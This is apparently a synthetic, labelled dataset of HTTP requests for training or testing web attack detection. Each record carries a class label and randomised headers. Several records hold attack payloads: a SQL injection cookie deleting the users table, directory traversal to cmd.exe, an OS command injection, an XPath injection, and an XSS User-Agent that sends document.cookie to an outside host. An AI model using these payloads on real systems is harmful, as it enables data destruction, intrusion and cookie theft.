Trailer: TE
User-Agent: Mozilla/8.0 (Windows; U; Windows NT 6.9; os-so; rv:7.0.2) Gecko/06487680
UA-CPU: x86
UA-Disp: 966,647,32
UA-OS: Windows NT
UA-Color: color16
UA-Pixels: 8432x1397
Via: HTTP/6.3 134.235.202.89, 8.5 www.w2oea.htm
Transfer-Encoding: compress
Upgrade: dieesm/2.6
Warning: 915 www.tluon.jpeg:326 "rrne4fWsouns" 
X-Forwarded-For: 90.82.25.41
X-Serial-Number: 00771445760189664084
----: -------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~

null

End - Id: 27788
Start - Id: 23594
class: Valid
GET /y5wBaKKhBKb5.wICy/aesgo/d1y0pt_TbcIAVlqLi/8kxozkpw.sh?FqTIMf_httpsVKB=Aoe6taIt&ruu3foeh=oEuveeltgers&rmo64i3bjyctan=MeosknTt&gs3Wtuppil=r4_&yxjnnr=mpcA&xtermDab@Y=d%3Efs%2BACpositionhu%27&shoeefhsrsh7=7734&raoy5r=0&orrhnqKkiihiwir=ir8%3D&xeCe3ret3tlgo=0189&danrdcroE9ides=+eel&e6dpntCmae2s=ruMaN3LDi HTTP/1.1
Host: 136.175.54.123
Connection: s3uhr
Accept: */*
Accept-Charset: *
Accept-Encoding: compress, compress, gzip;q=0.4, compress
Accept-Language: otaki-eaoL;q=0.1, t-qoe;q=0.8
Cache-Control: no-cache
Client-ip: 240.220.99.142
Cookie: e4r4eetntanr=3isoauc36l
Cookie2: $Version="6"
Date: Mon, 23 Apr 07 10:35:43 UTC
ETag: "deTB1BesKehTVhheWwR"
Expect: WFtlEa=s62Apn;bEaareaI=h3edeTeq
From: oaeee@aihbp.biz
If-Modified-Since: Tue, 01 Jul 08 22:11:49 UTC
If-Unmodified-Since: Sun, 09 May 04 14:46:50 CET
If-Match: *
If-None-Match: "g6gMXJVsz_SLszm"
If-Range: "y-0RAcc7vxYbLSgdR"
Max-Forwards: 2892
MIME-Version: 1.8
Pragma: no-cache
Proxy-Authorization: NTLM bnl1aTdnb3MxOTlobkU3Zm9sdWR0MGVubGF3ZHA5dGE=
Authorization: NTLM MWNpcjJiVE95TWE3YWViMGFwYW9hNEFmZVBlVGxvZTNQaGE=
Range: 62145-4,-94,41-
Referer: /ebsa/7ellt6tn/kdiete/orqh.swf
TE: trailers,trailers
Trailer: User-Agent
User-Agent: Mozilla/6.5 (Machintosh; U; Mac OS X 5.0; ay-ea; rv:9.1.5) Gecko/51071540
UA-CPU: PowerPC
UA-Disp: 990,4504,8
UA-OS: Solaris
UA-Color: color16
UA-Pixels: 251x222
Via: FTP/6.7 61.234.110.186:402, 8.6 www.mJua.css, FTP/2.2 104.145.213.99
Transfer-Encoding: deflate
Upgrade: 0hrIfz/4.4, oepr/9.3
Warning: 942 www.stchto.jpg "wMlilUefo" "Sun, 18 Jun 06 16:19:46 UTC"
X-Forwarded-For: 161.208.121.203
X-Serial-Number: 266315250602737413
----: -------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 23594
Start - Id: 35111
class: SqlInjection
GET /t5pnpoqageAa/lU/tnaemtNSntenEnr/lau4eF85UUxkTkso2CG/7ntisar4/N0a/8mVautoexec.dll?4Ytdase=8iuer&ikt4=5+s4n&yENaqMN0Gh=+j%24 HTTP/1.0
Host: www.doaep.it
Connection: close
Accept: */*;q=0.4
Accept-Charset: us-ascii;q=0.8
Accept-Encoding: identity, gzip
Accept-Language: eb-r, ArrjiiHd-ihi
Client-ip: 92.253.144.130
Cookie: hs=uha6fwk'    );   DELETE  FROM  users    WHERE  upper(username)   =     upper(    'admin
Date: Sat, 10 Dec 05 20:35:05 GMT
ETag: "9XSGO4JmBh20b27wb"
Expect: 100-continue
If-Modified-Since: Mon, 22 Oct 07 24:42:24 GMT
If-Unmodified-Since: Sat, 07 Jan 06 20:42:12 CET
If-Match: *
If-None-Match: *
If-Range: Sat, 09 Jan 10 06:09:39 UTC
Max-Forwards: 094
Pragma: igg=rpeSsdrO
Proxy-Authorization: 40is rg22aoe=iaendtt5
Authorization: NTLM ZGh3aHJuRGU2eGVkbzJTbXhkaGVkaG1MbnRGN2I1b3RodGVp
Range: 644787-
Referer: /tPennu1/senshSc/PtUnp/2crpd6i/95tn9r.aspx
TE: trailers
User-Agent: r5ollGbm (nFRj6auIZh; e8q_bD8bJQ; n7Y3stI8; yTkpdV)
UA-Pixels: 232x2395
Via: HTTP/8.6 172.20.253.88
Transfer-Encoding: deflate
Upgrade: Orh/3.7, 4nasaS/2.1
X-Serial-Number: 14015863

null

End - Id: 35111
Start - Id: 22811
class: Valid
GET /eNI@/oAaefdxOtmenaQcd/nufiAacaaanrpDyo/r4h3WSGF/njfOX036k/gOdecebclhaonn.pl? HTTP/1.1
Host: 201.255.45.68
Connection: keep-alive
Accept: application/*
Accept-Charset: x-mac-arabic;q=0.6, euc-tw, x-mac-cyrillic
Accept-Encoding: 
Accept-Language: 5eu9bsi-nCgtIet;q=0.8, ys-iep;q=0.8
Cache-Control: no-cache
Client-ip: 173.3.239.168
Cookie: Athi=rh eno[liEon84ddgeH;hyc7nooentaSy1=qlteh1kep;mloolN=Osres(e b%Mh@=u;rsEss7t4=passthru;k2ap=otaT=;hineuIrrO=mdhyeDh2iloe
Cookie2: $Version="219"
Date: Fri, 19 Mar 04 04:06:11 CET
ETag: "dy1SQ24-L8Gq_7JD"
Expect: 100-continue
From: ixeeaea8@ttdinp.org
If-Modified-Since: Wed, 22 Apr 09 12:35:58 CET
If-Unmodified-Since: Tue, 06 Jun 06 03:52:04 GMT
If-Match: "AvuWd2Vv.jSiLenZu"
If-None-Match: *
If-Range: "72eGl73A_DZIS6XyVo"
Max-Forwards: 13
MIME-Version: 8.0
Pragma: no-cache
Proxy-Authorization: Basic YzFTb1RyYXM6MVRubm94bmk=
Authorization: Basic dHRhYW86Tm5hYW51
Range: -637
Referer: http://aeej.be/rtnfai5d/eifNfsh/apislo7e/idws.mp3
TE: trailers,trailers,deflate
Trailer: Transfer-Encoding
User-Agent: tLcwB17T http://www.nwrS.net
UA-CPU: 68000
UA-Disp: 335,445,16
UA-OS: Windows NT
UA-Color: color16
UA-Pixels: 612x9972
Via: 3.9 189.147.198.234, 1.4 249.5.27.138, 5.1 14.61.169.38
Transfer-Encoding: compress
Upgrade: nlNDj/4.6
Warning: 800 240.77.225.63 "td5atf" 
X-Forwarded-For: 143.162.53.229
X-Serial-Number: 3049600663
----: ------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 22811
Start - Id: 44295
class: OsCommanding
GET /samples/..��..��..��..��..��../winnt/system32/cmd.exe?/c+ HTTP/1.1
Host: 163.186.57.3
Connection: close
Accept: video/*;q=0.3, text/*
Accept-Charset: *;q=0.0
Accept-Encoding: 
Accept-Language: rO-ckEteasg, a-egoesEd
Cache-Control: min-fresh=532
Client-ip: 86.249.82.37
Cookie: uiao=v:t;b9adtisiucnhSda=NtllargineEaha;ifbt=vr665oenrtneoYmt;eameb0ende=autoexecall;qvaPij=s o5a
Cookie2: $Version="583"
Date: Thu, 11 Mar 10 16:39:05 UTC
ETag: "Lnj8pag@wO5.tvVMS@g"
Expect: 100-continue
From: nfuh7eb@yeoee.gov
If-Modified-Since: Mon, 26 Jul 04 09:17:10 CET
If-Unmodified-Since: Sun, 27 Sep 09 07:31:09 GMT
If-Match: *
If-None-Match: *
If-Range: "PnObIr1--fPNEcLS0iL"
Max-Forwards: 884
MIME-Version: 6.9
Pragma: no-cache
Proxy-Authorization: NTLM b1dmc2ZsdHh6cmV0d2F0dDlsYmlkYWhpc2lrcW5kYWFlOHJ1Zw==
Authorization: wnaeh oheL=ooeioN
Range: 3-
Referer: /nstbwa/bortm/steul8r/erreeIr/sfaotoe.tar.gz
TE: trailers
Trailer: If-Match
User-Agent: MracNfseis/0.2.9.7
UA-CPU: PowerPC
UA-Disp: 9070,4804,16
UA-OS: Win95
UA-Color: color16
UA-Pixels: 6071x5916
Via: Tei8/8.8 205.87.46.2
Transfer-Encoding: gzip
Upgrade: Aers/1.0, riij1i/9.6
Warning: 525 251.120.159.217 "ay2yetttoyyhQsouLs" 
X-Forwarded-For: 81.125.200.90
X-Serial-Number: 7359375071
----: --------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 44295
Start - Id: 35614
class: XPathInjection
GET /epfuki/aKo/sbLevHpbq3-COP7oHT1.asmx?heenIcix=92+++++or+1%3C++++ezaufu%2F4%2F94ash%2Fchild%3A%3Atext%28%29%5Bposition%28%29%3D375%5D++++or+4341%3D%27%5D+%7C+%2F*+%7C+%2Ffoo%5Bbar%3D%27&zihbtleeys5=625730&qrthixoodU=tIdIPjSl8Hi&zi3Aa0=tuAnha&shthege0at6tyc=epN&ibodihi9r=%5DatchildDE&ElrleRyygi=m&oe2mersou=96&.div0E=jIhD8Gfa8&osvle3=53421&UB6udY2Npassthru=oj7&n3y=6271705&leEAetGbseau=nl3a HTTP/1.1
Host: 194.131.28.124
Connection: nurshrtv
Accept: */*;q=0.1
Accept-Charset: *;q=0.8
Accept-Encoding: *
Accept-Language: *;q=0.0
Cache-Control: min-fresh=6799
Client-ip: 101.51.218.73
Cookie: uncIf=euJVsetv;8usced=u2ski
Cookie2: $Version="102"
Date: Tue, 03 Jul 07 09:45:11 UTC
ETag: "yveLgmdxNwRjS_so3"
Expect: ioh3hbt
From: elnasan@dnyeHdoyd.be
If-Modified-Since: Tue, 11 Sep 07 17:07:29 UTC
If-Unmodified-Since: Thu, 01 Mar 07 16:04:36 GMT
If-Match: *
If-None-Match: *
If-Range: *
Max-Forwards: 3757
MIME-Version: 4.8
Pragma: 1=Uampieam
Proxy-Authorization: Basic c3l0ZWVBdDI6YU5paXRm
Authorization: sjmtg 0emoge=tvcAqte
Range: -827333,2893-
Referer: http://www.eelouchi.org/cs64i/tbgdepe/ooanmosy/esnirv/exrct.tar
TE: gzip,chunked,trailers
Trailer: Host
User-Agent: sV3M6vxP http://www.meni.cz
UA-CPU: PowerPC
UA-Disp: 458,730,8
UA-OS: FreeBSD
UA-Color: color16
UA-Pixels: 138x439
Via: ciiv/8.8 74.176.63.176, 0.3 101.128.38.105
Transfer-Encoding: identity
Upgrade: sivn/3.0
Warning: 642 225.30.125.246 "ai7adc" 
X-Forwarded-For: 163.147.115.220
X-Serial-Number: 65275952070459353
----: ----------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 35614
Start - Id: 17604
class: Valid
GET /rpBzGSaqpEE2/v-r6-RadminZHYsGC.png?eem=ihehrdrme&ssr8lswcEa=5972733&ineied00=nie HTTP/1.0
Host: 116.172.18.2
Connection: close
Accept: image/*;q=0.1
Accept-Charset: *
Accept-Encoding: *
Accept-Language: t-stlt, bwno-ahassirs, os6m-1cmt, vgmO-ewOenn;q=0.9, Hehe-s
Cache-Control: only-if-cached
Client-ip: 241.118.249.236
Cookie: E5Gjis=064;telrhauo=U)i|group byA;tesne6smr36dA=090076871;asesN4=242;trn1h3at=log3e1 
Cookie2: $Version="35"
Date: Thu, 24 Dec 09 02:31:01 GMT
ETag: W/"BkVFXafjeZNDem79"
Expect: 5ssl
From: x3Anoo0o@wRaou4.biz
If-Modified-Since: Wed, 24 Feb 10 11:27:03 CET
If-Unmodified-Since: Fri, 15 Oct 04 24:14:41 CET
If-Match: "8glPMcJHTU6XDuweLv"
If-None-Match: *
If-Range: "wG_CXv4zEnk.L@q"
Max-Forwards: 2
MIME-Version: 7.6
Pragma: no-cache
Proxy-Authorization: NTLM aWltYWZ2cmlpcmljZm1haTJuNjF0OW5zb2VlaWVlbmFkdnNvSG5uRGls
Authorization: NTLM d25lN2FvamVOb29hb3N0bmVpbjlkbjN1bjdvcml5ZmFkaG5tNzF0N3JpdHNsbzNF
Range: 65473-
Referer: /ot3di7eu/rr6h.cgi
TE: chunked;q=0.1,trailers
Trailer: Authorization
User-Agent: Mozilla/9.3 (X11; U; Linux i386 0.9; Ne-ne; rv:2.2.0) Gecko/25217854
UA-CPU: 68000
UA-Disp: 611,8955,16
UA-OS: Windows NT
UA-Color: color32
UA-Pixels: 519x8664
Via: FTP/2.1 www.espoeobw.jpeg, 8.2 www.saat.gif, FTP/6.2 185.215.139.146
Transfer-Encoding: identity
Upgrade: shme/8.6
Warning: 712 223.93.147.43 "mgu5s9ciwimaaiteyot" 
X-Forwarded-For: 147.216.169.233
X-Serial-Number: 607664307
----: ------------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 17604
Start - Id: 36584
class: OsCommanding
GET /scripts/file.bat" & dir c:/ .exe? HTTP/1.0
Host: www.OyvteEfmCy.be
Connection: ihaiagag
Accept: */*
Accept-Charset: cp-936;q=0.3
Accept-Encoding: *
Accept-Language: *
Cache-Control: no-cache
Client-ip: 252.39.154.149
Cookie: tfcbiaeolEm=aIoar~n;lpo0QOKe9tsF=2;kx6s=oirofsdtotow;6e=csv
Cookie2: $Version="05"
Date: Wed, 24 Jan 07 13:56:48 UTC
ETag: W/"ii87XQjje42GUbBHrDr"
Expect: 100-continue
From: osNAoh@aHn2nry.de
If-Modified-Since: Thu, 26 Mar 09 02:12:14 UTC
If-Unmodified-Since: Sun, 12 Nov 06 13:44:11 CET
If-Match: *
If-None-Match: *
If-Range: "YkdFyFmR4vc.Sz8ebw"
Max-Forwards: 2249
MIME-Version: 1.8
Pragma: no-cache
Proxy-Authorization: Digest nonce
Authorization: NTLM QWlyQnJpcGRlYWlSYWFla254emFpZzFkaGRjcXN0ZG9odXRsZXlocm5BZQ==
Range: 664709-2776,90-13953,2481-
Referer: http://drasont.gov/IXa2/tsvqIfn/Iaee0qnf/84sel.sh
TE: trailers,trailers,trailers
Trailer: If-Modified-Since
User-Agent: Ewuni (d3e3wTVi; pynnhn)
UA-CPU: PowerPC
UA-Disp: 380,5893,16
UA-OS: Windows NT
UA-Color: color32
UA-Pixels: 477x077
Via: 9.3 www.pghfza.png
Transfer-Encoding: 1iuif
Upgrade: mouNri/6.4
Warning: 353 98.201.134.39 "fe2bemhte" 
X-Forwarded-For: 50.37.241.255
X-Serial-Number: 8032084316017934872
----: ----------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 36584
Start - Id: 12224
class: Valid
GET /anhaYtAYJp_R-GKSj_xJ/enscbl/ekXbsC0_gatg60ae42AK/vn/baaibEcl.mspx?lufrrfoEugeremo=eeeahbrwi62t HTTP/1.0
Host: 163.254.134.100
Connection: close
Accept: */*;q=0.1
Accept-Charset: euc-tw;q=0.0, iso-8859-4, windows-1255;q=0.0, iso-2022-kr, shift_jis;q=0.8
Accept-Encoding: compress;q=0.7, compress, compress
Accept-Language: *;q=0.7
Cache-Control: no-cache
Client-ip: 218.85.114.86
Cookie: nt5aprAag4tfo=chtvrede4eee;BGhomeI=nph-rs;yLjni=2179268725
Cookie2: $Version="3"
Date: Tue, 30 Oct 07 15:38:19 GMT
ETag: "GrpqPH7QKMK6-iZdlT"
Expect: Au4dSmh
From: msaq@tanxaosh5.ch
If-Modified-Since: Wed, 11 Aug 04 15:34:15 GMT
If-Unmodified-Since: Mon, 06 Oct 08 12:55:27 UTC
If-Match: "4oHRqQxOL.PhyXEP"
If-None-Match: "cSAMaUMeEFokYZ9z"
If-Range: *
Max-Forwards: 204
MIME-Version: 9.0
Pragma: no-cache
Proxy-Authorization: whuq neane=nte9e
Authorization: Digest nc=e8992Ee4
Range: 979-59,-86,99671-
Referer: /naEtsw/red5fmci/i03nu.msf
TE: deflate;q=0.9
Trailer: Expect
User-Agent: Mozilla/3.4 (Machintosh; U; PPC Mac OS X 8.3; ar-sr; rv:8.2.8) Gecko/18396265
UA-CPU: PowerPC
UA-Disp: 652,946,16
UA-OS: Windows NT
UA-Color: color16
UA-Pixels: 9748x698
Via: 6.4 202.130.21.251
Transfer-Encoding: compress
Upgrade: xnhun/4.7, foajfe/4.9, tiTnoe/9.3, sHsmu/7.7
Warning: 093 www.niwbedo.shtml "3eaiaiRarlwbw8hiaee" "Tue, 10 Jan 06 12:35:20 UTC"
X-Forwarded-For: 28.18.79.109
X-Serial-Number: 2848892
----: -----------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 12224
Start - Id: 9530
class: Valid
GET /yqMc/ssGw1Ej_.TI4fS0/strylespsnkl3elr/XF2evscriptHMJ47/j-naOtLMKBD8/otCtLNUG5tIff/sY9Gv9OeMEHg1ixprbY/mettyettbnswpadte/nwYM/sE_8JkD.asp?ec7fo7eNIiwe1h2=is&APEaeaN=tEx%29aecntshutdown3t&pOtrn4=89275248&emjxsie6D=n&ao=994251&soIuzue=47562&btsssmrt=rGHv.2u&Dc0e=Ahttp&wa=49585663&jssysr=pxfb1&neieoeO=uhaving HTTP/1.1
Host: 130.131.70.27:80
Connection: close
Accept: video/*;q=0.4, image/*;q=0.2, application/rtf
Accept-Charset: *;q=0.0
Accept-Encoding: 
Accept-Language: *;q=0.0
Cache-Control: rti=q
Client-ip: 220.86.24.168
Cookie: -yM2WFh8pS=ny;MpRhrtptIi7ht=9;om43tnlstralIen=7;LsacceptaPstdin=0;hEbr1rd=2h;ihih97sueae=utnhatnydode
Cookie2: $Version="1"
Date: Sat, 26 Aug 06 13:33:05 GMT
ETag: "wRi26HRC9bfcc@uOd"
Expect: 100-continue
From: thohdtr@L5iulfcy.st
If-Modified-Since: Wed, 01 Dec 04 16:09:33 UTC
If-Unmodified-Since: Sat, 26 Sep 09 17:02:41 CET
If-Match: *
If-None-Match: "dWaL.Q.bHtkZP0P."
If-Range: Fri, 29 Jul 05 02:10:43 UTC
Max-Forwards: 189
MIME-Version: 2.5
Pragma: no-cache
Proxy-Authorization: UraeR rlDgih=Tobabi
Authorization: bapXtn nhybih=usrt
Range: 4-77
Referer: http://amt7nmc.st/besdsl.tar
TE: gzip
Trailer: Range
User-Agent: dysmxw/9.2.6.8
UA-CPU: 68000
UA-Disp: 389,574,16
UA-OS: Win98
UA-Color: color16
UA-Pixels: 1124x1179
Via: 9orm/8.0 www.eheEsRds.jpeg, HTTP/6.9 36.167.68.108
Transfer-Encoding: gzip
Upgrade: zZr/7.6, ri9ps3/0.6
Warning: 724 1.186.0.197:4 "pvtse" 
X-Forwarded-For: 107.141.77.183
X-Serial-Number: 2426894
----: -------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 9530
Start - Id: 15846
class: Valid
GET /e7IppUZwDCCe4yZXt/ayTQOdDgdaB4/iDFr9.EWi8yP65yF.png?euaoce=cna6g&ue=4816013&fTyaaccess_log=e%24o+systemx&oplsnqbq8E=%25%25um&lhhr=aicexeceto&DUtfstyleey1ftp=52942924&4gpci=g%40boK14O&rvlike1cAnullrm=ide5uaee&qIneiee=ttutoa0yn3si&nsjhaqKet=745&eodyA1rests=3ip5booar6&s9rrwstd=2394&DT8IUD9VRAhttp=70&G-hMLVshutdownyD=r9pOsna9muAa&jrntetzpqeCdo=ya%7Eu%2B0tdyaVmoWi HTTP/1.0
Host: www.oosiVl.net:3401
Connection: e9eov
Accept: */*
Accept-Charset: *;q=0.3
Accept-Encoding: *;q=0.6
Accept-Language: *;q=0.6
Cache-Control: j='rethra'
Client-ip: 127.204.91.129
Cookie: Ld=dLS_Jw;urnKsdKhaeynes=aGd@ioC@;5sice8=14206613;eherziieacuK=edr;sgse9=o;gdattYp=e7mQ2J1
Cookie2: $Version="833"
Date: Sun, 14 Nov 04 04:24:36 GMT
ETag: "Lgka-Qg8YEq22Z3L"
Expect: 100-continue
From: ciaes@3cRcrame2.ch
If-Modified-Since: Fri, 20 Nov 09 08:48:18 UTC
If-Unmodified-Since: Sat, 19 Nov 05 22:42:29 CET
If-Match: "X.Q7ySw@0_vTbJX"
If-None-Match: *
If-Range: Sat, 08 Dec 07 13:45:24 GMT
Max-Forwards: 97
MIME-Version: 7.8
Pragma: and0tesg='e7'
Proxy-Authorization: Digest nc=6CeB3cE8
Authorization: rnh0ip ldoin=loappn6u
Range: -630,9-,363-
Referer: /mo39e/ehSjrab/i3ds/malruof/seino.php4
TE: trailers
Trailer: If-Unmodified-Since
User-Agent: Mozilla/8.1 (compatible; xaesIleG; SunOS sun4u; eonfkaer)
UA-CPU: MIPS
UA-Disp: 338,6089,8
UA-OS: Win95
UA-Color: color16
UA-Pixels: 265x821
Via: 9.4 100.12.66.59, o3nr/1.0 74.47.198.228, 3.4 www.st5q.js
Transfer-Encoding: compress
Upgrade: lai/8.6, Rdiwtq/0.8
Warning: 734 www.a4hol.gif "8eiyls3tra8i3ro" "Sun, 10 Sep 06 06:04:47 CET"
X-Forwarded-For: 157.1.233.188
X-Serial-Number: 6066558353005235
----: -----------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~

null

End - Id: 15846
Start - Id: 26600
class: Valid
GET /xlogZhO_Pformdelete@/goz7cb/iyV@yxsoIl/baOnduiiot/cTTbU./jBgvyicahsnoashab.dll?ktejo=0541423941&adlrs4ytwdebsu=ityaai4fa HTTP/1.0
Host: 159.124.18.126
Connection: close
Accept: */*;q=0.5
Accept-Charset: *
Accept-Encoding: *;q=0.6
Accept-Language: oirw-adra;q=0.6
Cache-Control: min-fresh=785
Client-ip: 90.106.221.80
Cookie: X5JCRb=38659;4kBgfr7.K=Mhaving
Cookie2: $Version="720"
Date: Sun, 01 Feb 09 24:34:57 GMT
ETag: "OVl_tyxLsCTT2QUafu0O"
Expect: 100-continue
From: aucneam2@riewaCaudy.st
If-Modified-Since: Sat, 27 Jan 07 18:32:52 CET
If-Unmodified-Since: Tue, 22 Jul 08 22:13:17 UTC
If-Match: "DE5ypT0xzmEQhhwX"
If-None-Match: *
If-Range: *
Max-Forwards: 65
MIME-Version: 6.3
Pragma: 0a='axri'
Proxy-Authorization: Basic ZWFzcmZUczY6YmlkaXc=
Authorization: Basic dHhJbmFNOmNobm9EMw==
Range: 265-54174,0620-,-72
Referer: http://www.cfliN.org/bgiair.fgf
TE: deflate;q=0.8
Trailer: Referer
User-Agent: to7o/9.4.2
UA-CPU: Sparc
UA-Disp: 7024,486,32
UA-OS: WinNT
UA-Color: color32
UA-Pixels: 335x343
Via: 7.4 www.ifeRdwd.htm:0248, 2.8 181.253.157.56:321, 7.1 www.hnst.html:37
Transfer-Encoding: gzip
Upgrade: eorne/6.0, Ucobec/9.9, jtty/7.1
Warning: 846 14.21.113.100 "fyetrt" 
X-Forwarded-For: 220.222.195.180
X-Serial-Number: 693373977262
----: --------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 26600
Start - Id: 12300
class: Valid
GET /hdHcsee7nTchvncmtee/YzO4hsyee/hipde4asoheyL/csAeu5e2dtseNnt.php3?eeTyoieh=+EbiMiSap%5Cgroup+byt%3At+tt0dw&sRetIttcl=iBJR&ttewtssRb38=dgroup+byrrntds9h&HVq4jbgsoundQM=69651921&waenE=ehldsg+fAe%3Aecatwopenim&NpReele=pTg0BxA&1mdalKkmcl=emz8SXOK1&5a7sy92smneh=88932912&aaNaiukheoate=+1&e8egs1yqrn=l&HnNh7=httpsii&SeneHe=oto&uD8Ttnenj=i%5C&ih2=mq_AcPeXH7xZ&eH7P=shutdown%3Ei%27-hKm3oklwpLLsr HTTP/1.1
Host: 94.15.86.159
Connection: keep-alive
Accept: */*
Accept-Charset: *;q=0.5
Accept-Encoding: 
Accept-Language: *;q=0.2
Cache-Control: no-cache
Client-ip: 49.9.133.115
Cookie: te76moe=otcsR;1caPlmrlI3srhho=;i$3/a;qi=myaRbSdeethce;iieehni3oeou=il|var>sandr)rg
Cookie2: $Version="74"
Date: Sat, 28 Jan 06 18:50:28 GMT
ETag: "GwBN0nMB2QWnAOLX"
Expect: 100-continue
From: Stdteeh@0aeh.it
If-Modified-Since: Sun, 21 May 06 16:16:28 CET
If-Unmodified-Since: Wed, 19 Dec 07 24:26:17 UTC
If-Match: *
If-None-Match: *
If-Range: Sat, 27 Oct 07 21:41:28 GMT
Max-Forwards: 40
MIME-Version: 2.7
Pragma: nian='lhEs'
Proxy-Authorization: nat0lr uooaajy1=gemieovr
Authorization: 1ldmf7 ojEt=s2nd
Range: 2898-730,632-21408,7-
Referer: /Lqtssr/ieatao/3njfhx.pl
TE: deflate;q=0.6,trailers
Trailer: Host
User-Agent: Mozilla/7.3 (Machintosh; U; PPC Mac OS X 8.9; cx-oi; rv:2.7.1) Gecko/53197973
UA-CPU: 68000
UA-Disp: 1340,7925,16
UA-OS: Windows 95
UA-Color: color8
UA-Pixels: 4392x5610
Via: HTTP/1.4 www.Upsmrdah.js, 6.6 www.r6ruhwni.css, FTP/9.2 www.cnt7sE.html:1305
Transfer-Encoding: compress
Upgrade: iera/5.2, o29/7.6
Warning: 710 44.94.63.159 "Dh6webSt4" 
X-Forwarded-For: 175.249.76.8
X-Serial-Number: 61893291117945630
----: ---------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 12300
Start - Id: 48214
class: XSS
POST /a8bvOzB9Cbpw6Rv1QWu/hdj6VMS5ZtQn/eUa8uBZ_rJTL_AVEV/hektealpnt/tRUc7VMxY/4rieo6/dlri6ntel/usr3yjB2s2fromt/t15978vi7kViIC/hgz283-F-xO_dxWHyX/e0aRisztjIetyl/toheuwpatdepsxrHuld.jpg? HTTP/1.1
Content-Length: 35
Content-Language: eau,swornrg
Content-Encoding: gzip
Content-Location: /naytehe/tPyh7rwe/nSp4.tiff
Content-MD5: aHRlZGhhbkNzdGhvODBqYQ==
Content-Type: application/x-www-form-urlencoded
Expires: Tue, 18 May 04 13:04:56 GMT
Last-Modified: Thu, 01 Nov 07 04:37:29 UTC
Host: 91.141.89.199
Connection: close
Accept: application/*, audio/basic, audio/*
Accept-Charset: *;q=0.3
Accept-Encoding: *;q=0.2
Accept-Language: nntcok-t, gAah-iMpluinO;q=0.0, igLdAEn-y89tq;q=0.9, hn-seRoNtu;q=0.5
Cache-Control: max-age=11
Client-ip: 186.228.128.33
Cookie: Amnolo=51792;oTce=hupbh;snm6hdod=t0p0V
Cookie2: $Version="5"
Date: Sat, 21 Apr 07 01:44:41 CET
ETag: "IF@nF.ynM2buHoLm"
Expect: tm0t=fMee1
From: kTOsae7a@Lnatniube.cz
If-Modified-Since: Thu, 21 Dec 06 24:17:40 UTC
If-Unmodified-Since: Thu, 31 Dec 09 20:07:02 UTC
If-Match: "qW@TTem_10K147dlvHjC"
If-None-Match: *
If-Range: *
Max-Forwards: 654
MIME-Version: 6.3
Pragma: no-cache
Proxy-Authorization: bbm3n izqmgGa=ahdliua
Authorization: Digest realm
Range: 9-78819
Referer: http://Tutaeac.it/utyOv/kuetn/bigs.txt
TE: deflate;q=0.0,trailers
Trailer: Accept-Encoding
User-Agent: <img  src   =    "   javascript:[document.location.replace('http://www.channi.com/cgi-bin/tari.cgi'+document.cookie);]   "    >
UA-Disp: 991,4822,16
UA-OS: Windows 95
UA-Color: color32
UA-Pixels: 179x443
Via: 6.4 www.6evaoS.jpg
Transfer-Encoding: deflate
Warning: 878 www.r5rehang.gif "hcioniot2im682agn" "Thu, 10 Nov 05 20:56:18 CET"
X-Forwarded-For: 16.22.84.83
----: -----------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

i7cnkn=0&rseitao5B=rm3&bl8=5dRu0kRM

End - Id: 48214
Start - Id: 12052
class: Valid
GET /pimnaceane/iEbetweenE/5X89KvxCH/GT33ccG7update/khNr3/q3od@ZZ/lktAhtoh1wlepq/029ebe/vgrpelahahdtrOsis.mdb? HTTP/1.1
Host: 138.198.79.252
Connection: keep-alive
Accept: application/*
Accept-Charset: *
Accept-Encoding: 
Accept-Language: *;q=0.6
Cache-Control: no-cache
Client-ip: 108.226.107.164
Cookie: yqonrz=yBx2xY;rm=rrnErftf;bodyAN.7lnullin0dbin=htnnt;niboKdailenbp=rhW;V6inXscriptedzphpLvP=63741647;it3r8b=pumdtlbhnnIa
Cookie2: $Version="437"
Date: Wed, 01 Jun 05 14:29:17 UTC
ETag: "WIlOg@PPWov@iWWMW"
Expect: 100-continue
From: nhae@UAtUg.cz
If-Modified-Since: Sat, 03 Jan 09 01:35:17 CET
If-Unmodified-Since: Fri, 29 Sep 06 20:50:36 GMT
If-Match: "4MToveLmRHFDgA_lZx-"
If-None-Match: *
If-Range: "HX0yMV7fG8Zt9U5Kkcey"
Max-Forwards: 4
MIME-Version: 2.2
Pragma: tnhfl='sfia'
Proxy-Authorization: Digest nc=BD5B8C8A
Authorization: tqfr wcRlcwe=beE5
Range: 421490-
Referer: /mewdt/zbdTaLt3/21lttm/wnaIty/ai0nae.doc
TE: trailers
Trailer: Warning
User-Agent: Mozilla/0.2 (compatible; MSIE 1.3; Mac OS X; teniein; ehnheHompt)
UA-CPU: 68000
UA-Disp: 859,2266,16
UA-OS: WinNT
UA-Color: color8
UA-Pixels: 165x736
Via: 7.9 www.Tslqa3sq.jpeg, 4.3 97.206.83.175, 8.1 202.247.250.58
Transfer-Encoding: deflate
Upgrade: kymnd3/0.5, aRlm4/1.4, ejx/3.6, 0b3r/0.9
Warning: 109 162.109.30.41 "85mtwb" "Mon, 11 Jul 05 24:26:21 GMT"
X-Forwarded-For: 149.30.227.159
X-Serial-Number: 0645969
----: --------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 12052
Start - Id: 26908
class: Valid
